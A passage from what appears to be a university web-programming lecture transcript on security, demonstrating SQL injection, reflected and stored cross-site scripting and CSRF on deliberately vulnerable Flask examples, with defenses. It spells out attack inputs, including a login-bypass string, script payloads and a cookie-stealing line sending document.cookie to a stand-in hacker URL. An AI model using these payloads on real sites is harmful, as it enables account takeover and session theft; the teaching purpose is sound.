now I know that this particular
user has an account with this bank.
And that might not be something that
your application wants to expose.
And so as you go about
designing web applications,
you always want to be
bearing these things in mind.
Thinking about what information
from the database is being exposed,
and how information that
I don't want to be exposed
might end up exposed
to users that I don't want
to have access to that information.
And certainly this is
one potential example
that maybe you don't really
care if your users are
able to know if other people have
accounts on the website or not.
But maybe in a place where it's
more sensitive whether or not
a user has an account
on the website,
this might be something
you do care about.
And you'd want to think
carefully about how
you design the user interface,
about how users are interacting
with the database, and
whether or not you're
ever exposing information
that you don't want
to ultimately be exposed to the user.
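One common defense for the password-reset case is to give the same response whether or not the email has an account, and only actually send the email when it does. A sketch as a plain function, with a made-up set of registered addresses:

```python
# Sketch: return an identical message whether or not the address is
# registered, so the response leaks nothing about who has an account.
# The registered set here is hypothetical.
registered = {"alice@example.com"}

def request_password_reset(email):
    if email in registered:
        pass  # actually send the reset email here
    # Either way, the user sees the same message.
    return "If an account exists for that address, a reset email has been sent."

print(request_password_reset("alice@example.com"))
print(request_password_reset("nobody@example.com"))
```

Both calls print the same string, so probing the form no longer reveals which addresses have accounts.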
Questions about any of that?
OK.
So now moving onto the topic
about SQL and vulnerabilities
that we did talk about a couple weeks
ago, and namely that was SQL injection.
And does anyone recall what SQL
injection is and why it's a problem?
Yeah?
AUDIENCE: So in the SQL
lecture, we added an or condition.
BRIAN YU: Great.
We were able to add an or
condition, or more generally,
just some sort of SQL code
into input for instance,
and get our own SQL code to
run on someone else's server.
So we were able to effectively do
whatever we wanted with the database
because we could run arbitrary
SQL queries on that database.
And so the example we
looked at, which we'll
look at an actual Flask
example of that today,
is a user name and
password field where we
might use that information
on the back end
to run a SQL query that
looks something like this.
Select star from users
where user name equals
whatever the user name was and password
equals whatever the password was.
And we imagine that if a user logs in,
like Alice with the password hello,
then we'd end up running a query
that looks something like this,
substituting in Alice as the
username, hello as the password,
and now we're selecting from all the
users where Alice is the username
and hello is the password.
And if there is a matching one, then
this will return a row, and otherwise,
it won't.
And of course, in this
case, the password
is not hashed, though
in a more secure system,
we might want to hash that password
first and then run this query.
But what might go wrong here?
So we talked about what would happen if
someone types in Alice as the user name
and something like this as the
password, 1'OR'1'='1, which seems sort
of complicated, but the result of that
was that when we plugged everything
in, now we're selecting from users where
the user name is Alice and the password
is 1-- which it isn't--
or the string 1 equals the string 1.
Well, this is, of course, true, and
now we're going to get some row back.
And so how might that
actually work in practice?
Let's take a look at a web application
that implements this very idea of just
a very simple login system
where an exploit like this
can help anyone get access
to any other user account.
So let's take a look at
injection and application.py.
So this is just a Flask
application, and our default route,
this index route, first checks if there
is a username inside of the session.
If there is a user name in
the session, in other words,
if someone is logged into
this current session,
we'll go ahead and render a
user.html page that will just display
who's currently logged in for instance.
Otherwise, if there
is no user, then we're
going to go ahead and render a
login.html page that would give people
the option to log into this website.
And now, let's take a look at what's
happening inside of the login function.
So first thing we're doing is someone
logs in by submitting a post request
to /login.
Then we get the user name by going
request.form.get("username").
We get the password by
request.form.get("password"),
just extracting that
information from the form.
We're going to print
out what the query is.
You'll see an example
of that in a moment,
but this isn't strictly necessary.
The interesting thing
is here, on line 33.
We're running db.execute, running
a database query, and saying,
select star from users
where username equals
and then plugging in the
username here, and password
equals, plugging in the
password there, and then
just getting the first row
that comes back from that.
And if a row does come back from
that, if the query was successful,
then we log the user in by
storing them inside the session
and redirecting them
back to the index page.
Otherwise, we render the login
page again, saying invalid=True,
meaning there was some
authentication problem.
So that's all fairly straightforward.
And of course, the key
vulnerability to look at here
is the fact that whatever the
username and whatever the password is,
we just plugged them
straight into the SQL query
by just using string concatenation
in Python to join this all together.
So now if I were to run this Flask
application and take this URL
and go to that URL, I'm
faced with this login form.
And I can type in Alice--
and normally you would
want your password field
to use dots by setting the input type
to be password so nobody can see it,
but for the sake of example,
so you can see what I'm doing,
I've changed the password field
to just be a text field so you can
see what password is being typed in.
But of course, you would never
actually want to do that in practice.
But if I type hello as the
password, which is Alice's password,
and click Submit, now
I'm logged in as Alice.
It says, Welcome, alice.
And you can check by looking at the log.
Here's what got printed out.
Here was the query that ran.
Select star from users, where username
equals Alice and password equals hello,
and of course, that returned
back Alice as my one row,
and so that was all good.
I'll log out now.
If I try logging in with Alice
with a fake password, goodbye,
which is not the correct
password, and Submit,
I get Error, invalid credentials.
Why is that?
Well, here is the query that ran.
Select star from users, where user name
is Alice and password equals goodbye.
Well, that's not going
to return any results.
But of course, the injection attack
happens if I type user name Alice,
or user name, any user name that I
want, and type in 1'OR'1'='1, like that,
where now if I submit that, no matter
who the user is, now I see, Welcome,
alice.
I've logged into this user's
account, and why did that happen?
Well, here's the query that was run.
Select star from users where username
equals Alice and password equals 1 or 1
equals 1.
So by injecting arbitrary
SQL logic into this code,
I was able to gain access to any
user account that I wanted to.
And that's why it's very
important, when we're
using SQL and running SQL queries, that
we're careful to avoid SQL injection.
That any time user input
is being put into a query,
we want to escape any
potential characters that
might be part of a SQL
query in order to make sure
that nobody can just
run whatever SQL queries
they want to inside of our code.
And SQLAlchemy, which you may
have been using in Python in order
to do some of this stuff,
automatically takes
care of doing some of
that escaping for you,
if you're passing in the
parameters in a Python dictionary
for instance, which you
might have done before.
And so that's certainly
something you can use as well.
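The contrast between the vulnerable concatenation and a properly escaped query can be sketched with Python's built-in sqlite3 module. The schema and data here are made up for illustration, not the lecture's actual database:

```python
# Sketch: string-concatenated SQL versus a parameterized query, using
# Python's built-in sqlite3 module. Schema and data are illustrative.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'hello')")

username, password = "alice", "1' OR '1'='1"

# Vulnerable: user input is concatenated straight into the SQL text, so the
# OR clause becomes part of the query and the injection succeeds.
query = ("SELECT * FROM users WHERE username = '" + username +
         "' AND password = '" + password + "'")
print(db.execute(query).fetchone())  # a row comes back despite the bad password

# Safe: placeholders let the database driver escape the input for us, so the
# injection string is treated as one literal (and wrong) password.
row = db.execute(
    "SELECT * FROM users WHERE username = ? AND password = ?",
    (username, password),
).fetchone()
print(row)  # None: no user has that literal password
```

The `?` placeholders are sqlite3's syntax; SQLAlchemy's named parameters accomplish the same escaping.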
Questions about SQL vulnerabilities?
Whether it was reasons why we might
want to use hashed passwords inside
of our database, how we might
accidentally leak information
via that forgot-your-password
page, or how we might have gone
about using SQL injection
to gain access to unauthorized data.
OK.
Next up, before we take
our break, was about APIs.
So we were thinking about Application
Programming Interfaces, the idea
that people could write APIs
for their web applications
that let people programmatically gain
access to information about whatever it
is that your website is designed to do.
So in the case of book
reviews, maybe you
had an API route that returned
the reviews for a particular book.
But you might imagine that
other sites might give you
API routes that do other things.
We didn't do this for
project three, but you
might imagine that in a restaurant,
for instance, that had a website,
you might have an API route that gives
you back your orders, for instance.
What security considerations
should go into designing APIs?
Or what could potentially go wrong?
Broad questions, so lots
of possibilities here.
AUDIENCE: You can expose stuff
that shouldn't be exposed.
BRIAN YU: You can expose stuff
that shouldn't be exposed.
So that's an interesting
idea, that if I, for instance,
had an API for being able to look at
my Amazon orders or look at the food
that I've ordered from a
restaurant in particular,
I would want that to somehow
only be accessible to me
and not accessible to someone else.
And so how would we implement
this idea of some people
should be able to access
certain information by the API,
and other people should not be
able to access that information
and should only be able to access
some other pieces of information?
AUDIENCE: Authentication.
BRIAN YU: Authentication, great.
We can use what are commonly
known as API keys, which are just
strings of text that are
associated with a particular user,
effectively like a
password, but for APIs.
Such that in order to
make an API request,
you not only need to
submit your request,
but you also need to
submit your API key.
And then it's on the web application
to check that key, to say,
does this key have permission to look at
the things that it's trying to look at?
And this is the idea of
route authentication,
that if someone makes an API
request to a particular route,
you better first make sure that whoever
is making that request has permission
to see whatever they're asking to see
before you actually show it to them.
And so API keys can be
used for that as well.
In addition, they're often
used for rate limiting,
where if you're worried about
someone overusing an API
or abusing your server by making
thousands upon thousands of requests
in a short period of
time, you can rate limit
and say, well, I only want
you to be able to make
x number of requests per hour.
And if you have an API
key, then it's pretty easy
to implement this idea of rate
limiting because all you have to do
is keep track inside of a
table somewhere this API key
has used 28 requests in the last hour,
so they're hitting up on their limit.
And so if they use any
more, we should just
stop allowing them to use the API key
until it refreshes for the next hour,
for instance.
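That per-key counting can be sketched in a few lines. The limit, window length, and in-memory table here are all arbitrary choices for illustration; a real application would likely back this with a database or cache:

```python
# Sketch of per-API-key rate limiting: track recent request timestamps per
# key and refuse once the limit for the window is reached. The limit and
# window values are arbitrary.
import time
from collections import defaultdict

LIMIT = 30        # requests allowed per window
WINDOW = 3600.0   # window length in seconds (one hour)

request_times = defaultdict(list)  # api_key -> timestamps of recent requests

def allow_request(api_key, now=None):
    now = time.time() if now is None else now
    # Drop timestamps that have aged out of the window.
    recent = [t for t in request_times[api_key] if now - t < WINDOW]
    request_times[api_key] = recent
    if len(recent) >= LIMIT:
        return False  # over the limit; the client should back off
    recent.append(now)
    return True

# With LIMIT = 30, the 31st request inside the window is refused.
results = [allow_request("key123", now=1000.0 + i) for i in range(31)]
print(results[-2], results[-1])  # True False
```

Once the oldest timestamps fall out of the window, requests are allowed again, which matches the "refreshes for the next hour" behavior described above.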
And so in your project, you might
not have needed to use an API key,
but anytime you want to deal with
potentially authenticated data
or you want to rate limit, then you'll
want to think about using an API key
like you did have to use
with the good reads API
in order to take advantage
of features like rate
limiting or authenticating
particular routes
to make sure that only
certain users have the ability
to access particular routes.
Questions about that?
All right.
In that case, we'll take a short
break and when we come back,
we'll take a look at JavaScript and look
at the many different kinds of security
vulnerabilities that
come about when we start
introducing JavaScript and client-side
code into our web applications.
Welcome back.
So we're at about the
midway point in the course,
and then we started to
talk about JavaScript.
And so JavaScript, if you
recall, was the language
that we were using in
order to write code
on the client side, code that was
actually running inside the user's
browser and not on the server
where Flask or Django was running,
for instance.
And this leads to a whole new host of
potential security vulnerabilities.
So let's start to chat about these.
What could go wrong?
What sorts of exploits
could happen, can you
think of, when we start to introduce
JavaScript into the equation?
Code that can run inside
the user's browser.
Yeah?
AUDIENCE: When we [INAUDIBLE]
information, [INAUDIBLE] even that it
can change.
Like someone's address [INAUDIBLE]
that changing someone's
address to someone else and
using JavaScript [INAUDIBLE]..
BRIAN YU: Great.
So JavaScript has all these event
handlers that we've talked about,
whether on load or on click,
that can do various things.
And potentially, if someone
clicks on something in code that
does something malicious
that's able to run,
it can make something
potentially bad happen.
And we'll take a look at at least
one example of that definitely
later on today.
Other things that could
potentially go wrong?
There are a lot of potential
security vulnerabilities here.
So let's just toss out some ideas.
What would we want to
avoid happening now
that we have JavaScript code
that can run inside the browser?
AUDIENCE: Someone might redirect from
the site you're on to another site.
BRIAN YU: Great.
Certainly, someone might try
and redirect from the site
you're on to some other site.
That we've looked at ways that
we can use JavaScript in order
to redirect someone from
one place to another.
And if we're not careful,
that JavaScript code
might be able to redirect the user
to someplace that the user doesn't
necessarily want to be.
And so we'll definitely look at
an example of that later on, too.
So that's definitely one
potential vulnerability.
Yeah?
AUDIENCE: So like with HTML and
CSS, it was all static, just
like what a user sees.
But with JavaScript,
you can actually use
it to run code on someone's machine.
So if you write a malicious code, you
can [INAUDIBLE] someone's computer.
BRIAN YU: Exactly.
So with HTML and CSS,
we didn't really need
to have to worry about code
actually running for the most part
because it was just here's
the way that things look.
And certainly we were able to
use that to try and trick users
by creating a link that looked
like it went to Bank of America
but actually went to my
version of some different site.
But when it comes to
JavaScript, now we really
have the potential for malicious code
to be running on the user's web browser.
And so how does that code get
to the user's web browser?
How does malicious code enter into
some other seemingly benign site,
and why might those
be potential exploits?
So where we'll start is by looking at
one potential JavaScript exploit, which
is quite common, called
cross-site scripting.
Where the idea of
cross-site scripting is
that we're going to try and
look for a vulnerability
where we can-- in the same
way that in the SQL case,
we were able to inject whatever SQL code
we wanted into being run on a database,
a malicious user, if they are able to
send the right link to the right person
and get them to click
on a link for instance,
are able to get some arbitrary
JavaScript code to run inside
of the user's web browser.
And so let's take a look at a
very simple Flask application.
This is in fact, the entire
Flask application, the contents
of application.py, for example.
And there is in fact, a
major cross-site scripting
vulnerability inside this
application, and see if we
can tease apart where exactly that is.
So at the beginning, we import
Flask, and we import request,
which we'll need access to later.
We create a new Flask application
inside the current module.
Then we define a default route,
just when you go to the slash route.
It calls this index function
that returns Hello, world.
And then down here, we
have app.errorhandler(404).
So you may not have seen
this before, but Flask
has built in error handlers
that are specific functions that
run when specific error codes happen.
So 404, you might
recall, is the error code
for not found when someone
goes to a page that
doesn't exist on the web server.
And what Flask can do for you is say
whenever a 404 error happens on the web
server, go ahead and run this function,
which is going to supposedly render
my 404 error page.
And you can do the same
thing for error 500,
for example, internal server
errors, or 403, forbidden errors,
or any other errors
status code you want.
If you want particular code
to run, a particular template
to be displayed when a particular error
code happens on your web application,
you can use a Flask's
built in error handler
to be able to handle those
particular situations.
So what we have here is a function
that is supposed to handle 404 errors,
that handles a page not found error.
It calls this page not found
function, and all the page not
found function is going to
do is say return not found.
And then it's going to append
request.path, where request.path
is what the URL was that
the user tried to go
to that resulted in the 404 error.
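A sketch of that application, along the lines just described (this is a reconstruction, not necessarily the lecture's exact file):

```python
# Reconstruction of the vulnerable application described above: the 404
# handler reflects request.path into the response without escaping it,
# which is the cross-site scripting hole.
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def index():
    return "Hello, world!"

@app.errorhandler(404)
def page_not_found(e):
    # Vulnerable: whatever path the user requested is echoed back verbatim,
    # so a URL containing <script>...</script> injects JavaScript.
    return "Not Found: " + request.path, 404
```

Returning the tuple `("...", 404)` keeps the response's status code at 404 while still sending the reflected body.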
And so what might that mean?
It means that if a user
goes to /foo, for example,
then what's going to happen is--
I'll go ahead and go into
cross-site scripting zero
and go ahead and run
this web application,
running that very same code.
So I get hello, world when
I go to the default route,
if I don't type in anything after the URL.
But if I go to /foo for example,
what do I expect to see?
AUDIENCE: Error not found.
BRIAN YU: Great.
Not Found: foo, because not found
was the initial message that
gets returned when a 404 error happens.
And then /foo is the path, the
request path that I tried to request.
And so this might be pretty typical.
That if I go to a URL
that doesn't exist,
I probably expect a page like
this to show up that says, sorry,
this route, this path that
you were trying to request,
couldn't be found on the web server.
So what can go wrong there?
Here's the web application,
where's the security vulnerability?
Yeah?
AUDIENCE: So someone maybe could
somehow inject a script path
into your request path location.
BRIAN YU: Great, exactly.
So the vulnerability is
with this request path.
That if someone is able to inject
JavaScript code into this request
path, now suddenly, the
thing that I'm returning
is not found colon,
potentially some JavaScript
code that is then going to be run.
And you might imagine that if a hacker
now is able to take one of these URLs
and convince a user to click on a link
that takes them to a URL like that,
that takes them to this particular
function in my Flask application, now
suddenly this hacker is able to
run whatever JavaScript code they
want to inside of the web application.
So what might that look like?
Instead of just going to /foo as the
route that returns a benign not found
/foo on the page, what if, for instance,
the user typed in this as their URL?
Where after the slash, they type script
alert hi /script, end JavaScript.
Now this is going to be
the request path, which
means what gets put into
return not found colon,
we're going to return
some page that says not
found and then this JavaScript code.
This JavaScript code
that says alert, hi.
So this is code now that
if someone clicks on,
might potentially be
executed by this web browser,
an example of cross-site scripting.
That someone is able
to send me this link,
and they were able to inject random
JavaScript, whatever they want,
into this particular application.
So let's try it.
So again, going to /foo,
says Not Found, foo.
If I do a /bar, it says Not Found bar.
What's going to happen if I
do script alert hi /script?
So here's my URL now.
Rather than type in foo or bar,
I've added to this JavaScript code
to the URL and I'm going
to try and run that.
What's going to happen?
AUDIENCE: An alert.
AUDIENCE: Get an alert.
BRIAN YU: We'll get an alert.
That's what we expect
to happen, at least.
In fact, Chrome is getting
pretty good at this.
Chrome and other web browsers
have built-in security features.
So Chrome actually stopped me.
It gave me this page that
says, this page isn't working.
Chrome detected unusual
code on this page
and blocked it to protect
your personal information,
for example, passwords, phone
numbers, and credit cards.
And if we look down here, it
says error, blocked by XSS,
or cross-site scripting, error blocked
by cross-site scripting auditor.
So Chrome's got some
built-in feature here
that's checking for potential
cross-site scripting,
like what we just tried to
do, and it's blocking me
from getting access to this page.
And this defends against certainly
some kinds of cross-site scripting,
but not all.
And we'll see an example of one which
bypasses Chrome in just a moment.
And certainly you can't
rely on all web browsers
to be able to have this built-in
cross-site scripting auditor built in,
so these are definitely still
things to be careful about.
So what would happen if this auditor
didn't exist, if it wasn't in place?
We can actually find out.
That Chrome actually lets us, if
I run Chrome from the command line
with the --disable-xss-auditor flag,
I can run Chrome without running
the cross-site scripting auditor.
Just turn that auditor off.
And now if I go here, slash script
alert hi, just like I did before,
and press Return, now I
get the alert that says hi.
I've injected JavaScript
code into this page,
and after I press OK, now
it says not found, slash.
And of course that
seemed relatively benign,
that an alert certainly showed up.
JavaScript code was running, but
nothing was really compromised.
So where might this go wrong?
Where could this really
become a problem?
Can anyone think of why this might
really start to become an issue?
Injecting arbitrary JavaScript code.
Yeah?
AUDIENCE: An executable
could be put in there.
BRIAN YU: Great.
Any executable thing could be
put into this JavaScript code
so that any code could run.
And in particular, that
means that anything
could happen on the web
browser, including potentially
secure information being exposed.
And so in the case of Flask and
when we talked about logging
in and logging out, we've
talked about this a little bit,
how does the browser know--
or when the server is-- when
someone logs into a website
and the server says, OK,
this user is now logged in.
When I go and click on another button,
how does the browser or the server
still know that I'm the one
logged into the website?
AUDIENCE: Session.
BRIAN YU: The session, certainly.
And how does that--
or what do we know from the--
what's happening on the client side?
How does it know that it's
coming from the same place?
That it's the same user
that's making that request?
AUDIENCE: It's in a cookie.
BRIAN YU: Inside of a cookie, yes.
So that we've got some cookie, some
information, stored in our computer.
That is the cookie that tells the
server-- it's like a hand stamp that
says, yes, this is me.
Show me the same page that
I was looking at before.
I'm still logged in.
And we talked about if someone were
ever to get access to that cookie,
then they would be able to login as us.
They could pretend to be us and
therefore use our credentials,
and the server wouldn't be
able to tell the difference
because that cookie is a
valid cookie, for instance.
And so let's take a look
at now, if it wasn't
this script that was being passed
into the application, but this script.
Slightly different,
slightly more complicated.
We've got /script, so
we're starting JavaScript.
We say document.write, which
is just a way of writing
new information, new text, into
the HTML content of the page,
and we're adding an image,
which seems sort of strange.
Image source equals hacker
URL, where hacker URL
is some URL of some hacker's website.
And cookie equals, and then
we added document.cookie,
which is going to represent the
cookie for this particular web
browser, this particular page.
And then end angled bracket, and
that's the end of the JavaScript.
We effectively just added an image tag
into the page where the source of that
image is supposedly
hacker_url?cookie=document.cookie.
Why is that a problem?
What's just happened here?
Yeah?
AUDIENCE: You're going to
hit the hacker's website
and pass your cookie as a [INAUDIBLE].
BRIAN YU: Exactly.
We're going to hit the hacker's
website, and any time we're
making a request to that server,
that server is potentially
logging exactly what URL was requested.
In fact, if you've been using
Flask or Django all this time
and you've looked at
the terminal window,
you've probably noticed
over here that you've
been able to see every single
request that's been made.
Here was a GET request to the URL slash,
here's a GET request to the URL /foo,
here's a GET request to the URL /bar.
And so if our hacker is carefully
monitoring all of the requests
to the server over here at hacker URL,
they're going to notice something like
someone made a request to
hacker_url?cookie= and then some
cookie, right?
So by injecting this JavaScript
code into the user's web browser
and having this run, they've
added this image tag that's
going to make a request
to hacker_url and is
going to pass this information,
that cookie-- so now
the cookie that was
originally on your computer,
someone else now has access to
because you've now just put it inside
of some request that's going elsewhere.
And that's why Chrome was giving us
that error, that warning message about,
well, be careful.
We tried to block you from being able
to see this page because it looks
like someone might be able to
inject JavaScript code that
might be able to steal your
passwords or other information.
Because any information, we can just
send in a request to some other URL,
in this case.
And so this is really the danger of
cross-site scripting, this ability
to inject JavaScript
into any arbitrary page.
Questions about any of that?
AUDIENCE: Question.
BRIAN YU: Great.
Yeah?
AUDIENCE: What did they do with cookie?
I mean--
BRIAN YU: Good question.
What can we do with the cookie?
So once you have the cookie,
you could potentially
use that to login as
someone else, for instance.
Or any secure information that's stored
in that cookie, you'd have access to.
So if there are secure pieces
of data stored in the cookie,
then that's potentially a vulnerability.
And we talked in the last lecture, I believe, about how Flask gives you the option, if you want, of storing all of your session information inside of a cookie.
Which means secure information about
the contents of your shopping cart
or how much money you
have in your account
might be stored inside
of that cookie, which
could potentially be a vulnerability.
But even if that's
not there, at minimum,
that cookie is a way of
convincing the server
that someone else is who you are.
If they steal your cookie, they can
convince the server that they are you.
And then they can have
access to your account
on whatever web application this
is and potentially do whatever
they want with that information.
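As an aside, Flask does sign its session cookies so that clients can't tamper with their contents. Here is a minimal, hypothetical sketch of that signing idea using Python's standard library; the names and cookie format are illustrative, not Flask's actual implementation. Note that a signature does nothing to protect a cookie that's been stolen outright, since the attacker can just replay the signed value as-is.

```python
import hmac
import hashlib

# A minimal sketch of the idea behind signed session cookies: the server
# attaches an HMAC signature so it can detect tampering. Signing does NOT
# stop a stolen cookie from being replayed; it only proves the cookie was
# produced by the server. SECRET_KEY is an illustrative name.
SECRET_KEY = b"server-side-secret"

def sign(value):
    """Return the value plus an HMAC signature, joined by a dot."""
    sig = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value + "." + sig

def verify(cookie):
    """Return the original value if the signature checks out, else None."""
    value, _, sig = cookie.rpartition(".")
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking information through timing differences.
    return value if hmac.compare_digest(sig, expected) else None

cookie = sign("user_id=42")
assert verify(cookie) == "user_id=42"             # untampered cookie accepted
assert verify("user_id=99." + "0" * 64) is None   # forged cookie rejected
```

In practice Flask delegates this work to the itsdangerous library, which rests on the same underlying idea.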
AUDIENCE: Would that be time bound
with the-- like with that session,
that you'd have to use
it for the next session?
BRIAN YU: Good question.
Would it be time bounded?
It quite possibly could be.
If I were to log out, for instance, and the server then forgets about that cookie, suddenly we've been able to avert this scenario; the stolen cookie is no longer going to be valid.
But if they can convince me to
click on the URL again the next time
I log into the site, now it suddenly
becomes a problem all over again.
And so we'll want to think carefully about, when we're using JavaScript inside of our web applications, is there a place where we might be vulnerable?
In fact, our original web application
didn't even have any JavaScript in it
at all.
It was really just Flask
and returning text.
But still, a malicious hacker was able
to inject JavaScript into our page
just because we were including that
raw JavaScript in there as well.
So these are certainly
things to be mindful of.
And both Flask and Django
have ways of making sure
that when you're inserting information,
it's inserted in a safe way such
that we escape any potential
JavaScript characters to help
avoid these types of situations.
But these are just good
things to be mindful of
and be careful about as we go about
designing these web applications.
Let's go ahead and take another look at
another example of cross-site scripting
and how it can happen.
What I will look at now is a
slightly more complicated site,
and this is one that Chrome
is actually not going
to be able to fully defend against.
And what cross-site scripting one is, is a web application that is going to display a message list; it's sort of a message board.
We saw a brief example of something
that looked very similar to this
when we were first
taking a look at Flask
and how we're able to
render templates and such.
This one actually uses a database.
And I'll show you what it looks like.
We'll look at application.py.
So I have a SQLite
database that I'm going
to be using that's just going to
store a whole bunch of messages
so that it can be on this
public message board.
And effectively, I have just one
route, a default index route,
where if I'm just viewing
this page by a GET request,
just asking to see the page,
I skip over this post stuff,
and I just get all the messages.
SELECT * FROM messages: just get all the messages in the message board.
And then go ahead and render
this template, index.html passing
in those messages.
And then, if it's a
post request, then I'm
going to get whatever the contents
of the message that I'm trying to add
is, whatever came in through
this form, and then I'm
going to insert into my messages
table, whatever that content is.
So if I type in a new message and insert
it, I submit that via a post request.
It gets added to my list
of growing messages.
And otherwise, if I'm just
requesting the page normally,
or even after something
is done being inserted,
I'm going to request
for all the messages
by selecting it all from the
database and then rendering it inside
of index.html.
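To make that logic concrete, here is a rough, Flask-free sketch of the same idea using an in-memory SQLite database; the real application.py wires queries like these into a single Flask route, and the function name here is illustrative.

```python
import sqlite3

# A simplified sketch of the message-board logic just described, minus Flask:
# a POST inserts a message, and every request selects all messages back out.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE messages (content TEXT)")

def handle_request(method, content=None):
    if method == "POST":
        # Parameterized query: the driver escapes content for SQL, which
        # prevents SQL injection -- but it does nothing about XSS, because
        # the stored string comes back out verbatim, script tags and all.
        db.execute("INSERT INTO messages (content) VALUES (?)", (content,))
    return [row[0] for row in db.execute("SELECT * FROM messages")]

handle_request("POST", "foo")
handle_request("POST", "bar")
assert handle_request("GET") == ["foo", "bar"]
```

The key observation for what follows: whatever string went in, including JavaScript, is exactly what the template will later be asked to display.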
So what does that look like?
The result is that using just
these couple of lines of code,
I now have this Message List site
where I can type in foo as a message,
submit that.
And now the message foo is
there, bar goes in there,
and this gets added to
the public message board.
And of course, if I were to close
this site and I were to open it again
or someone else were to open
it again on their computer,
because it's all drawing from the same
database, now I go back here again.
Foo and bar are still there, so
those messages are still there.
And so where is the opportunity for
cross-site scripting attacks here?
AUDIENCE: You could store
a script in the database.
BRIAN YU: Exactly.
We could store a script in the database,
a script could be one of the messages.
Such that that JavaScript
code gets just inserted
into the HTML contents
of this page here,
and then it could potentially run.
So if I were to add a message that was like, <script>alert('hi')</script>,
and then submit that, well, what seems
to happen here is that when I try
and submit it, Chrome
is giving me some error.
It's giving me that same error as
before, this page isn't working.
Chrome detected unusual code.
Here's that cross-site scripting
auditor saying, hey, wait a minute,
something's wrong.
And the reason it was able
to do that is because when
I was submitting my request,
there was some JavaScript
included inside that request.
So Chrome was able to
detect that something
might be a little fishy there, that I
was submitting this JavaScript along
with the request, and then
it was coming back to me.
So what about if I were to close
the page and open it again.
Now I'm just requesting the page.
There's no JavaScript in the
URL, and all that's happening
is that it's extracting
information from the database
and displaying it onto the page.
And so Chrome now has
no real way of knowing
that there is any potential
cross-site scripting involved.
So I go here, and now
I get the hi alert.
They were able to run arbitrary
JavaScript on this page.
And then I see foo and bar
and then just some empty thing
because that's where the
JavaScript code was before.
So here's an example of a cross-site scripting vulnerability that we were able to take advantage of, to exploit, just by adding JavaScript code in here as well.
And so I haven't been committing
these changes to the database.
I haven't been saving them.
So if I run this again, we'll
be reset back to a clean slate.
So if I go back here, I see
a blank message list again.
So what are some other things
that I could potentially do?
Well, let's say someone posts foo and then bar. Maybe I could say, I just want to display whatever contents I want. So I'm going to add JavaScript that says <script>document.body.innerHTML = 'whatever page I want';</script>, and I submit that.
Again, Chrome blocks it the first time because it detects that, with this request at least, there was something fishy going on.
But when the next request comes in,
when the next person comes along,
they open this page, now
message list is gone.
I don't see foo and bar or
any of those other messages.
I just see whatever the contents of
the page that I wanted to show was.
And that gets displayed
to the user here.
So that's certainly one
thing they could do.
Certainly stealing cookies is another
thing that could happen in the same way
that we saw it in the last example.
Or someone could say, you know what?
Let's just take the user to
an entirely different site.
Let's take them to my site where I can
now try and steal information from them
as well by saying
window.location equals,
and I can say cs50.github.io/web.
And so now this window.location
equals some URL is the JavaScript code
that I'm running.
I'll submit that.
And when the next user comes along
and they try and go to my page,
now they're suddenly redirected.
I've taken them somewhere else entirely.
And if that other new page looks
sort of similar to the old page,
they might be tricked into
thinking it is the same old page.
And they might be interacting with it,
typing in their credentials, usernames,
and passwords, and now this hacker is
able to gain access to that as well.
And so how do we defend against
these sorts of cross-site scripting
vulnerabilities?
Well, Flask is actually
pretty good about this.
And by default, when you're rendering
a template, like render template,
and you're plugging in some information,
Flask will, by default, automatically
escape that stuff for you.
It will say, you know what?
This is stuff that could
potentially be JavaScript
or could potentially be unsafe, so
we'll go ahead and escape it and protect
that information for you.
Certainly not all
frameworks are like that,
and certainly if you're just
doing string concatenation
like we were in the previous
example, then that's
not something we can really rely on.
But if we take a look at templates/index.html, in order for this to really work the way that I wanted it to, I had to add this | safe filter in here, where this is my way of telling Jinja2, the template rendering engine, don't worry about escaping anything. Just display the contents.
And so in reality, if you were
to just do message.content,
Flask would be smart enough to try
and defend against this for you.
But it is something
that you just want to be
careful about anytime you have text that
you think is safe, is it really safe?
Is there a potential for JavaScript
code to be injected into there?
And if you're generating the templates
yourself by string concatenation
like we were in the previous example,
is there an opportunity for cross-site
scripting to appear there as well?
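What Jinja2's autoescaping buys you can be illustrated with Python's standard-library html.escape, which rewrites the characters a browser would otherwise treat as markup. This is just an illustration of the idea, not Jinja2's actual code.

```python
from html import escape

# A malicious "message" like the one typed into the message board.
payload = "<script>alert('hi')</script>"

# Concatenating it raw into a template leaves the script executable:
unsafe_page = "<li>" + payload + "</li>"
assert "<script>" in unsafe_page

# Escaping first turns the markup into inert text the browser just displays:
safe_page = "<li>" + escape(payload) + "</li>"
assert safe_page == "<li>&lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;</li>"
```

The escaped version still shows the user the literal text of their message; it just can no longer run as code.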
And so that's certainly one of
the major vulnerabilities that
can come about as we start
to deal with JavaScript
and using JavaScript inside
of our web applications.
Questions about that?
All right.
Let's move on and take a look
at the next web framework
that we talked about, which
in particular was Django.
And so when we first
took a look at Django,
we looked at how we would go
about doing the same things we
did in Flask, about rendering
templates and displaying pages
and using server side
logic to handle requests.
And in particular, we looked at forms.
And when we did look at
forms, I had to add a line
to one of the forms that
seemed a little bit strange.
Does anyone remember what that line was?
Yes?
AUDIENCE: CSRF token.
BRIAN YU: Yeah, we added
the CSRF token line to it.
And I said don't worry about that
for now, we'll talk about it later.
And now is that time that we're
going to start talking about it.
CSRF stands for Cross-Site
Request Forgery.
And this is yet another
type of attack that people
can use, where cross-site request forgery is the idea of forging a request to some other website in order to take some action on a site that the user might already be logged into.
And so what might be an example of that?
Let's say, for instance, that
someone was logged into their bank,
on their bank's website.
And I, on some other website,
wanted to try and trick
the user into transferring
some money to me, for instance.
How might I go about doing that?
Well, you might imagine
very simply that I
might start by creating a
website, my own website, that
looks something like this.
I have the body of my website, I have an a href, a link. And this link goes to http://yourbank.com/transfer, and then some arguments, some GET parameters: to=brian, amount=2800, for instance.
And if the bank is set up in such a way,
where making a GET request to /transfer
by passing in as arguments who
you're transferring to and what
the amount is initiates a transfer,
now I've been able to create a
sort of security vulnerability.
That if this is what's
displayed on my page
and I can convince someone to click
here, so long as they're already
logged in to yourbank.com,
then clicking on that link will automatically initiate that transfer.
So if yourbank.com is
set up in that way,
such that transferring money just
happens via this GET request,
then that's certainly a way
that I could trick someone
